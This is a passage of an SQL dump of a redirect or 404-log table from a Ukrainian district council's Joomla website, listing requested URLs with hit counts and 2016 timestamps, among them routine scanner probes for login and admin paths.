00:00:00',301),(28432,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=976:2013-03-21-18-42-06&lang=en&option=com_content&view=article','','','',1,0,'2016-04-07 08:06:47','0000-00-00 00:00:00',301),(28433,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=731:2012-07-02-08-51-09&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-07 08:07:46','0000-00-00 00:00:00',301),(28434,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=890:2014-01-06-08-19-15&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-07 08:08:48','0000-00-00 00:00:00',301),(28435,'http://www.malyn-rayrada.org.ua/index.php?catid=53&id=1083:-2014-&Itemid=94&lang=en&option=com_content&view=article','','','',1,0,'2016-04-07 08:53:44','0000-00-00 00:00:00',301),(28436,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1179:2014-01-21-12-44-04&Itemid=0&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-07 08:59:00','0000-00-00 00:00:00',301),(28437,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=734:-6-2012-&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-07 09:02:29','0000-00-00 00:00:00',301),(28438,'http://www.malyn-rayrada.org.ua/index.php?id=42:--16052012-&Itemid=80&lang=en&layout=blog&limitstart=10&option=com_content&view=category','','','',1,0,'2016-04-07 09:16:42','0000-00-00 00:00:00',301),(28439,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&id=43&lan__7bf__g=en&lang=en&layout=blog&limitstart=25&option=com_content&view=category','','','',1,0,'2016-04-07 09:16:45','0000-00-00 00:00:00',301),(28440,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=481:-2012-2015-&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-07 09:16:46','0000-00-00 00:00:00',301),(28441,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=708:-l-r&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-07 09:32:18','0000-00-00 00:00:00',301),(28442,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1063:2013-08-02-17-32-04&Itemid=&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-07 10:35:48','0000-00-00 00:00:00',301),(28443,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=488:2011-12-02-06-34-46&Itemid=73&lang=en&option=com_content&view=article','','','',1,0,'2016-04-07 10:39:01','0000-00-00 00:00:00',301),(28444,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=598:2012-02-29-14-13-44&Itemid=0&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-07 10:40:49','0000-00-00 00:00:00',301),(28445,'http://www.malyn-rayrada.org.ua/index.php?id=53&Itemid=94&lang=ru&layout=blog&limitstart=5&option=com_content&view=category','','','',1,0,'2016-04-07 10:47:00','0000-00-00 00:00:00',301),(28446,'http://www.malyn-rayrada.org.ua/index.php/706-do-vidoma-deputativ-miscevih-rad/','','','',1,0,'2016-04-07 10:57:26','0000-00-00 00:00:00',301),(28447,'http://www.malyn-rayrada.org.ua/index.php?catid=51&id=1047:2013-07-10-05-51-36&Itemid=92&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-07 13:40:50','0000-00-00 00:00:00',301),(28448,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/426-visti-iz-pirizhok-za-materialami-trs-polissja','','','',1,0,'2016-04-07 13:47:47','0000-00-00 00:00:00',301),(28449,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46&id=842:2012-12-10-13-55-57&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-07 14:46:50','0000-00-00 00:00:00',301),(28450,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/1196-2014-01-30-14-12-50?lang=en','','','',1,0,'2016-04-07 15:16:28','0000-00-00 00:00:00',301),(28451,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/images/stories/07-pens.jpg','','','',1,0,'2016-04-07 15:39:44','0000-00-00 00:00:00',301),(28452,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40:--28032012-&id=617:-----l---28r-----&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-07 16:24:07','0000-00-00 00:00:00',301),(28453,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&id=43&lan__7bf__g=en&lang=uk&layout=blog&limitstart=30&option=com_content&view=category','','','',1,0,'2016-04-07 16:42:57','0000-00-00 00:00:00',301),(28454,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29:--15122010-&id=208:2010-12-15-14-26-03&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-07 17:13:18','0000-00-00 00:00:00',301),(28455,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40&id=596:2012-02-28-12-59-05&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-07 18:27:33','0000-00-00 00:00:00',301),(28456,'http://www.malyn-rayrada.org.ua/index.php?Itemid=68&catid=34:--15062011-&id=348:2011-06-15-12-35-38&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-07 19:13:42','0000-00-00 00:00:00',301),(28457,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33:-20052011&id=324:2011-05-20-16-10-02&lang=en&option=com_content&view=article','','','',1,0,'2016-04-07 19:40:14','0000-00-00 00:00:00',301),(28458,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=828:-q-q&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-07 20:03:18','0000-00-00 00:00:00',301),(28459,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=506:-lr&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-07 20:57:11','0000-00-00 00:00:00',301),(28460,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&catid=42&id=632:-2011-2015-&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-07 21:07:16','0000-00-00 00:00:00',301),(28461,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29:--15122010-&id=203:2010-12-15-14-10-45&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-07 21:40:39','0000-00-00 00:00:00',301),(28462,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1189:2014-01-28-09-46-45&Itemid=70&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-07 22:08:29','0000-00-00 00:00:00',301),(28463,'http://www.malyn-rayrada.org.ua/index.php?id=48&Itemid=87&lang=uk&layout=blog&option=com_content&view=category','','','',1,0,'2016-04-07 22:13:41','0000-00-00 00:00:00',301),(28464,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=760:-qq-24-2012-&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-07 22:17:28','0000-00-00 00:00:00',301),(28465,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40:--28032012-&id=581:2012-02-27-13-13-19&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-07 22:21:59','0000-00-00 00:00:00',301),(28466,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1275:2014-04-10-13-24-47&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2016-04-07 22:37:46','0000-00-00 00:00:00',301),(28467,'http://www.malyn-rayrada.org.ua/index.php?catid=49&id=983:2013-04-04-11-23-57&Itemid=88&lang=ru&option=com_content&view=article','','','',1,0,'2016-04-07 22:39:51','0000-00-00 00:00:00',301),(28468,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&id=45:--14112012-&lang=en&layout=blog&limitstart=5&option=com_content&view=category','','','',1,0,'2016-04-08 00:52:01','0000-00-00 00:00:00',301),(28469,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=507:2011-12-19-17-10-52&Itemid=0&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-08 01:36:52','0000-00-00 00:00:00',301),(28470,'http://www.malyn-rayrada.org.ua/index.php/685-z-novim-rokom-ta-rizdvom-hristovim_2/','','','',1,0,'2016-04-08 02:03:46','0000-00-00 00:00:00',301),(28471,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&id=33:-20052011&lang=en&layout=blog&limitstart=10&option=com_content&view=category','','','',1,0,'2016-04-08 03:38:46','0000-00-00 00:00:00',301),(28472,'http://malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=565:2012-02-03-09-48-29&itemid=76&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-08 03:44:06','0000-00-00 00:00:00',301),(28473,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=976:2013-03-21-18-42-06&lang=uk&option=com_content&view=article','','','',1,0,'2016-04-08 05:22:17','0000-00-00 00:00:00',301),(28474,'http://www.malyn-rayrada.gov.ua/m/','','','',3,0,'2016-04-10 08:03:42','0000-00-00 00:00:00',301),(28475,'http://www.malyn-rayrada.gov.ua/mobile/','','','',2,0,'2016-04-10 08:23:39','0000-00-00 00:00:00',301),(28476,'http://www.malyn-rayrada.gov.ua/wp-login.php','','','',147,0,'2016-04-10 19:05:14','0000-00-00 00:00:00',301),(28477,'http://www.malyn-rayrada.gov.ua/admin.php','','','',43,0,'2016-04-10 19:05:15','0000-00-00 00:00:00',301),(28478,'http://www.malyn-rayrada.gov.ua/admin/','','','',20,0,'2016-04-10 19:08:15','0000-00-00 00:00:00',301),(28479,'http://malyn-rayrada.gov.ua/m/','','','',3,0,'2016-04-12 14:51:09','0000-00-00 00:00:00',301),(28480,'http://www.malyn-rayrada.gov.ua/index.php','','','',20,0,'2016-04-14 05:29:16','0000-00-00 00:00:00',301),(28481,'http://malyn-rayrada.gov.ua/wp-login.php','','','',260,0,'2016-04-16 21:25:57','0000-00-00 00:00:00',301),(28482,'http://malyn-rayrada.gov.ua/templates/rada0804/wp-login.php','','','',1,0,'2016-04-16 21:25:57','0000-00-00 00:00:00',301),(28483,'http://malyn-rayrada.gov.ua/media/com_attachments/css/wp-login.php','','','',3,0,'2016-04-16 21:25:58','0000-00-00 00:00:00',301),(28484,'http://malyn-rayrada.gov.ua/media/plg_vtemimagehover/css/wp-login.php','','','',3,0,'2016-04-16 21:25:58','0000-00-00 00:00:00',301),(28485,'http://malyn-rayrada.gov.ua/templates/system/css/wp-login.php','','','',3,0,'2016-04-16 21:26:00','0000-00-00 00:00:00',301),(28486,'http://malyn-rayrada.gov.ua/templates/rada0804/css/wp-login.php','','','',1,0,'2016-04-16 21:26:00','0000-00-00 00:00:00',301),(28487,'http://malyn-rayrada.gov.ua/index.php/wp-login.php','','','',3,0,'2016-04-16 21:26:00','0000-00-00 00:00:00',301),(28488,'http://malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/wp-login.php','','','',3,0,'2016-04-16 21:26:01','0000-00-00 00:00:00',301),(28489,'http://malyn-rayrada.gov.ua/index.php/deputatska-storinka/wp-login.php','','','',3,0,'2016-04-16 21:26:01','0000-00-00 00:00:00',301),(28490,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/wp-login.php','','','',3,0,'2016-04-16 21:26:02','0000-00-00 00:00:00',301),(28491,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/wp-login.php','','','',3,0,'2016-04-16 21:26:02','0000-00-00 00:00:00',301),(28492,'http://malyn-rayrada.gov.ua/attachments/article/1411/wp-login.php','','','',1,0,'2016-04-16 21:26:03','0000-00-00 00:00:00',301),(28493,'http://malyn-rayrada.gov.ua/attachments/article/1409/wp-login.php','','','',1,0,'2016-04-16 21:26:03','0000-00-00 00:00:00',301),(28494,'http://malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/2010-06-06-03-57-58/wp-login.php','','','',3,0,'2016-04-16 21:26:04','0000-00-00 00:00:00',301),(28495,'http://malyn-rayrada.gov.ua/modules/mod_djimageslider/themes/default/css/wp-login.php','','','',3,0,'2016-04-16 21:26:04','0000-00-00 00:00:00',301),(28496,'http://malyn-rayrada.gov.ua/media/djextensions/magnific/wp-login.php','','','',3,0,'2016-04-16 21:26:04','0000-00-00 00:00:00',301),(28497,'http://malyn-rayrada.gov.ua/modules/mod_sj_moduletabs/assets/css/wp-login.php','','','',3,0,'2016-04-16 21:26:05','0000-00-00 00:00:00',301),(28498,'http://malyn-rayrada.gov.ua/images/sampledata/pochesni_grom/wp-login.php','','','',3,0,'2016-04-16 21:26:05','0000-00-00 00:00:00',301),(28499,'http://malyn-rayrada.gov.ua/images/fotogalereya/wp-login.php','','','',3,0,'2016-04-16 21:26:06','0000-00-00 00:00:00',301),(28500,'http://malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/2010-06-05-13-46-44/wp-login.php','','','',3,0,'2016-04-16 21:26:06','0000-00-00 00:00:00',301),(28501,'http://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-05-12-51-34/wp-login.php','','','',3,0,'2016-04-16 21:26:06','0000-00-00 00:00:00',301),(28502,'http://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-05-12-51-18/wp-login.php','','','',3,0,'2016-04-16 21:26:07','0000-00-00 00:00:00',301),(28503,'http://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-05-12-52-17/wp-login.php','','','',3,0,'2016-04-16 21:26:07','0000-00-00 00:00:00',301),(28504,'http://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-05-12-50-56/wp-login.php','','','',3,0,'2016-04-16 21:26:08','0000-00-00 00:00:00',301),(28505,'http://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-07-09-15-05/wp-login.php','','','',3,0,'2016-04-16 21:26:09','0000-00-00 00:00:00',301),(28506,'http://malyn-rayrada.gov.ua/modules/mod_zt_visitor_counter/assets/css/wp-login.php','','','',3,0,'2016-04-16 21:26:10','0000-00-00 00:00:00',301),(28507,'http://malyn-rayrada.gov.ua/modules/mod_zt_visitor_counter/assets/digit/wp-login.php','','','',3,0,'2016-04-16 21:26:10','0000-00-00 00:00:00',301),(28508,'http://malyn-rayrada.gov.ua/modules/mod_zt_visitor_counter/assets/style/wp-login.php','','','',3,0,'2016-04-16 21:26:11','0000-00-00 00:00:00',301),(28509,'http://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-05-12-50-39/wp-login.php','','','',3,0,'2016-04-16 21:26:12','0000-00-00 00:00:00',301),(28510,'http://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-07-07-54-47/wp-login.php','','','',3,0,'2016-04-16 21:26:12','0000-00-00 00:00:00',301),(28511,'http://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-07-09-14-38/wp-login.php','','','',3,0,'2016-04-16 21:26:13','0000-00-00 00:00:00',301),(28512,'http://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2010-06-07-09-43-24/wp-login.php','','','',3,0,'2016-04-16 21:26:13','0000-00-00 00:00:00',301),(28513,'http://malyn-rayrada.gov.ua/index.php/deputatska-storinka/publichna-informacija_2/wp-login.php','','','',3,0,'2016-04-16 21:26:14','0000-00-00 00:00:00',301),(28514,'http://malyn-rayrada.gov.ua/index.php/deputatska-storinka/2011-03-31-12-03-04/wp-login.php','','','',3,0,'2016-04-16 21:26:14','0000-00-00 00:00:00',301),(28515,'http://malyn-rayrada.gov.ua/index.php/deputatska-storinka/ochishchennya-vladi/wp-login.php','','','',3,0,'2016-04-16 21:26:15','0000-00-00 00:00:00',301),(28516,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku/wp-login.php','','','',1,0,'2016-04-16 21:26:15','0000-00-00 00:00:00',301),(28517,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1423-pro-zatverdzhennya-redaktora-gazeti-malinski-novini','','','',34,0,'2016-04-21 09:11:09','0000-00-00 00:00:00',301),(28518,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1423-pro-zatverdzhennya-redaktora-gazeti-malinski-novini?tmpl=component&print=1&layout=default&page=','','','',12,0,'2016-04-21 09:47:40','0000-00-00 00:00:00',301),(28519,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1423-pro-zatverdzhennya-redaktora-gazeti-malinski-novini','','','',28,0,'2016-04-21 18:01:44','0000-00-00 00:00:00',301),(28520,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1425-pro-reformuvannya-drukovanogo-zasobu-masovoji-informatsiji-ta-redaktsiji-zasnovnikom-spivzasnovnikom-yakikh-e-malinska-rajonna-rada','','','',3,0,'2016-04-22 10:00:38','0000-00-00 00:00:00',301),(28521,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1427-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2016-rik','','','',17,0,'2016-04-23 05:38:48','0000-00-00 00:00:00',301),(28522,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1425-pro-reformuvannya-drukovanogo-zasobu-masovoji-informatsiji-ta-redaktsiji-zasnovnikom-spivzasnovnikom-yakikh-e-malinska-rajonna-rada','','','',6,0,'2016-04-23 16:26:54','0000-00-00 00:00:00',301),(28523,'http://www.malyn-rayrada.gov.ua/index.php/1424-pro-sklikannya-6-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya','','','',104,0,'2016-04-29 06:17:45','0000-00-00 00:00:00',301),(28524,'http://malyn-rayrada.gov.ua/index.php/1424-pro-sklikannya-6-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya','','','',76,0,'2016-04-30 11:08:33','0000-00-00 00:00:00',301),(28525,'http://malyn-rayrada.gov.ua/index.php/1424-pro-sklikannya-6-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-04-30 11:08:35','0000-00-00 00:00:00',301),(28526,'http://www.malyn-rayrada.gov.ua/index.php/1424-pro-sklikannya-6-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-04-30 11:10:23','0000-00-00 00:00:00',301),(28527,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45//images/stories/explore.gif','','','',1,0,'2016-05-02 00:01:03','0000-00-00 00:00:00',301),(28528,'http://www.malyn-rayrada.gov.ua/index.php/2010-','','','',3,0,'2016-05-02 08:33:53','0000-00-00 00:00:00',301),(28529,'http://malyn-rayrada.gov.ua/attachments/article/2/Декларація Левковець 2015.pdf','','','',2,0,'2016-05-07 14:14:47','0000-00-00 00:00:00',301),(28530,'http://www.malyn-rayrada.gov.ua/attachments/article/1402/ÐŸÑ–Ð´Ñ ÑƒÐ¼ÐºÐ¸ відкритого поіменного Ð³Ð¾Ð»Ð¾Ñ ÑƒÐ²Ð°Ð½Ð½Ñ  25031016.pdf','','','',1,0,'2016-05-10 06:46:05','0000-00-00 00:00:00',301),(28531,'http://malyn-rayrada.gov.ua/attachments/article/1431/ÐŸÑ–Ð´Ñ ÑƒÐ¼ÐºÐ¸ відкритого поіменного Ð³Ð¾Ð»Ð¾Ñ ÑƒÐ²Ð°Ð½Ð½Ñ .pdf','','','',2,0,'2016-05-10 07:10:54','0000-00-00 00:00:00',301),(28532,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1427-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2016-rik','','','',2,0,'2016-05-10 12:34:31','0000-00-00 00:00:00',301),(28533,'http://malyn-rayrada.gov.ua/attachments/article/1436/Декларації Ñ Ñ–Ð»ÑŒÑ ÑŒÐºÑ– ради1.pdf','','','',2,0,'2016-05-12 16:51:39','0000-00-00 00:00:00',301),(28534,'http://malyn-rayrada.gov.ua/index.php/1414-malinska-odpi-informue?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-05-14 13:29:15','0000-00-00 00:00:00',301),(28535,'http://malyn-rayrada.gov.ua/index.php/1414-malinska-odpi-informue','','','',54,0,'2016-05-14 13:37:29','0000-00-00 00:00:00',301),(28536,'http://www.malyn-rayrada.gov.ua/index.php/1414-malinska-odpi-informue','','','',16,0,'2016-05-15 13:34:17','0000-00-00 00:00:00',301),(28537,'http://www.malyn-rayrada.gov.ua/index.php/1414-malinska-odpi-informue?tmpl=component&print=1&layout=default&page=','','','',1,0,'2016-05-15 13:34:18','0000-00-00 00:00:00',301),(28538,'http://www.malyn-rayrada.gov.ua/attachments/article/1402/Підсумки відкритого поіменного голосування 25031016.pdf','','','',2,0,'2016-05-15 20:05:41','0000-00-00 00:00:00',301),(28539,'http://www.malyn-rayrada.gov.ua/attachments/article/1444/ÐŸÑ–Ð´Ñ ÑƒÐ¼ÐºÐ¸ відкритого поіменного Ð³Ð¾Ð»Ð¾Ñ ÑƒÐ²Ð°Ð½Ð½Ñ _130516.pdf','','','',1,0,'2016-05-17 05:23:22','0000-00-00 00:00:00',301),(28540,'http://malyn-rayrada.gov.ua/attachments/article/1444/ÐŸÑ–Ð´Ñ ÑƒÐ¼ÐºÐ¸ відкритого поіменного Ð³Ð¾Ð»Ð¾Ñ ÑƒÐ²Ð°Ð½Ð½Ñ _130516.pdf','','','',2,0,'2016-05-18 08:43:52','0000-00-00 00:00:00',301),(28541,'http://malyn-rayrada.gov.ua/xmlrpc.php','','','',63,0,'2016-05-18 15:31:46','0000-00-00 00:00:00',301),(28542,'http://malyn-rayrada.gov.ua/attachments/article/1402/ÐŸÑ–Ð´Ñ ÑƒÐ¼ÐºÐ¸ відкритого поіменного Ð³Ð¾Ð»Ð¾Ñ ÑƒÐ²Ð°Ð½Ð½Ñ  25031016.pdf','','','',2,0,'2016-05-19 05:07:23','0000-00-00 00:00:00',301),(28543,'http://www.malyn-rayrada.gov.ua/images/xxu.php','','','',9,0,'2016-05-21 01:14:07','0000-00-00 00:00:00',301),(28544,'http://www.malyn-rayrada.gov.ua/attachments/wp-login.php','','http://www.malyn-rayrada.gov.ua/attachments/wp-login.php','',6,0,'2016-05-22 03:01:08','0000-00-00 00:00:00',301),(28545,'http://www.malyn-rayrada.gov.ua/admin/login.php','','','',15,0,'2016-05-23 19:29:01','0000-00-00 00:00:00',301),(28546,'http://www.malyn-rayrada.gov.ua/forum/','','http://www.malyn-rayrada.gov.ua/','',1,0,'2016-05-27 16:50:20','0000-00-00 00:00:00',301),(28547,'http://www.malyn-rayrada.gov.ua/guestbook/','','http://www.malyn-rayrada.gov.ua/','',1,0,'2016-05-28 09:33:13','0000-00-00 00:00:00',301),(28548,'http://www.malyn-rayrada.gov.ua/blog/','','http://www.malyn-rayrada.gov.ua/','',15,0,'2016-05-28 11:13:52','0000-00-00 00:00:00',301),(28549,'http://malyn-rayrada.gov.ua/attachments/article/2/Ð”ÐµÐºÐ»Ð°Ñ€Ð°Ñ†Ñ–Ñ  Ричипоренко за 2015 рік.pdf','','','',2,0,'2016-05-28 19:10:09','0000-00-00 00:00:00',301),(28550,'http://malyn-rayrada.gov.ua/attachments/article/2/Ð”ÐµÐºÐ»Ð°Ñ€Ð°Ñ†Ñ–Ñ  Левковець.pdf','','','',2,0,'2016-05-28 19:45:05','0000-00-00 00:00:00',301),(28551,'http://www.malyn-rayrada.gov.ua/includes.php','','','',15,0,'2016-05-29 13:38:42','0000-00-00 00:00:00',301),(28552,'http://malyn-rayrada.gov.ua/admin.php','','','',58,0,'2016-05-30 16:33:51','0000-00-00 00:00:00',301),(28553,'http://malyn-rayrada.gov.ua/admin/login.php','','','',34,0,'2016-05-30 16:33:51','0000-00-00 00:00:00',301),(28554,'http://malyn-rayrada.gov.ua/admin/','','','',31,0,'2016-05-30 16:34:09','0000-00-00 00:00:00',301),(28555,'http://www.malyn-rayrada.gov.ua/sqlibak.php','','http://www.googlebot.com/bot.html','',1,0,'2016-06-01 16:40:16','0000-00-00 00:00:00',301),(28556,'http://www.malyn-rayrada.gov.ua/index.php?option=com_user&view=register','','','',3,0,'2016-06-04 00:57:21','0000-00-00 00:00:00',301),(28557,'http://www.malyn-rayrada.gov.ua/component/user/register','','','',3,0,'2016-06-04 00:57:22','0000-00-00 00:00:00',301),(28558,'http://www.malyn-rayrada.gov.ua/index.php/component/user/register','','','',3,0,'2016-06-04 00:57:23','0000-00-00 00:00:00',301),(28559,'http://malyn-rayrada.gov.ua/index.php/1438-vikonkom-malinivskoji-silskoji-radi-ogoloshue-konkurs','','','',32,0,'2016-06-04 20:54:04','0000-00-00 00:00:00',301),(28560,'http://malyn-rayrada.gov.ua/bitrix/admin/index.php?lang=en','','','',28,0,'2016-06-05 11:09:01','0000-00-00 00:00:00',301),(28561,'http://malyn-rayrada.gov.ua/user/','','','',22,0,'2016-06-05 11:15:01','0000-00-00 00:00:00',301),(28562,'http://www.malyn-rayrada.gov.ua/index.php/1438-vikonkom-malinivskoji-silskoji-radi-ogoloshue-konkurs','','','',11,0,'2016-06-07 09:12:14','0000-00-00 00:00:00',301),(28563,'http://malyn-rayrada.gov.ua/8e1ebc2f-dad5-4b67-b3ea-cad77eb15885','','','',1,0,'2016-06-08 22:44:31','0000-00-00 00:00:00',301),(28564,'http://www.malyn-rayrada.gov.ua/index.php/1438-vikonkom-malinivskoji-silskoji-radi-ogoloshue-konkurs?tmpl=component&print=1&layout=default&page=','','','',7,0,'2016-06-09 17:16:22','0000-00-00 00:00:00',301),(28565,'http://malyn-rayrada.gov.ua/bc601cab-20d1-4bc0-a23f-3515b32b8b7d','','','',1,0,'2016-06-12 03:19:29','0000-00-00 00:00:00',301),(28566,'http://www.malyn-rayrada.gov.ua/attachments/article/1436/Декларації сільські ради1.pdf','','','',1,0,'2016-06-12 20:29:58','0000-00-00 00:00:00',301),(28567,'http://malyn-rayrada.gov.ua/ce1aad1e-a722-412e-9eec-cca2de8ed6dd','','','',1,0,'2016-06-14 00:48:03','0000-00-00 00:00:00',301),(28568,'http://malyn-rayrada.gov.ua/index.php/1438-vikonkom-malinivskoji-silskoji-radi-ogoloshue-konkurs?tmpl=component&print=1&layout=default&page=','','','',1,0,'2016-06-17 17:37:43','0000-00-00 00:00:00',301),(28569,'http://malyn-rayrada.gov.ua/nau:/ukr/z0633-16/','','','',5,0,'2016-06-25 12:04:56','0000-00-00 00:00:00',301),(28570,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/ 6','','','',1,0,'2016-06-29 16:53:58','0000-00-00 00:00:00',301),(28571,'http://malyn-rayrada.gov.ua/index.php/ 17','','','',2,0,'2016-06-29 16:54:14','0000-00-00 00:00:00',301),(28572,'http://www.malyn-rayrada.gov.ua/nau:/ukr/z0633-16/','','','',1,0,'2016-07-03 01:06:26','0000-00-00 00:00:00',301),(28573,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1483-pro-priznachennya-direktora-komunalnogo-zakladu-rajonnij-budinok-kulturi-malinskoji-rajonnoji-radi','','','',38,0,'2016-07-11 15:00:54','0000-00-00 00:00:00',301),(28574,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1483-pro-priznachennya-direktora-komunalnogo-zakladu-rajonnij-budinok-kulturi-malinskoji-rajonnoji-radi','','','',41,0,'2016-07-12 02:19:54','0000-00-00 00:00:00',301),(28575,'http://malyn-rayrada.gov.ua/sinoptik.ua/informers_js.php?title=3&wind=1&cities=303015024&lang=ua',NULL,'','',1,0,'2016-07-13 14:20:51','0000-00-00 00:00:00',301),(28576,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1488-pro-zvilnennya-melnika-a-p',NULL,'','',21,0,'2016-07-14 13:03:31','0000-00-00 00:00:00',301),(28577,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1489-pro-priznachennya-direktora-komunalnogo-zakladu-rajonnij-budinok-kulturi-malinskoji-rajonnoji-radi-2',NULL,'','',32,0,'2016-07-14 15:50:04','0000-00-00 00:00:00',301),(28578,'http://malyn-rayrada.gov.ua/attachments/article/1481/Ð¾Ð±Ñ”Ð´Ð½Ð°Ð½Ð½Ñ .pdf',NULL,'','',1,0,'2016-07-14 19:03:52','0000-00-00 00:00:00',301),(28579,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1489-pro-priznachennya-direktora-komunalnogo-zakladu-rajonnij-budinok-kulturi-malinskoji-rajonnoji-radi-2',NULL,'','',31,0,'2016-07-14 20:35:13','0000-00-00 00:00:00',301),(28580,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1470-pro-likvidatsiyu-pristantsijnoji-zosh-i-ii-stupeniv',NULL,'','',19,0,'2016-07-14 21:39:07','0000-00-00 00:00:00',301),(28581,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1470-pro-likvidatsiyu-pristantsijnoji-zosh-i-ii-stupeniv',NULL,'','',77,0,'2016-07-14 22:17:45','0000-00-00 00:00:00',301),(28582,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1488-pro-zvilnennya-melnika-a-p',NULL,'','',27,0,'2016-07-14 23:00:02','0000-00-00 00:00:00',301),(28583,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1492-pro-vnesennya-zmin-do-shtatnikh-rozpisiv-komunalnikh-zakladiv-kulturi',NULL,'','',18,0,'2016-07-15 07:57:14','0000-00-00 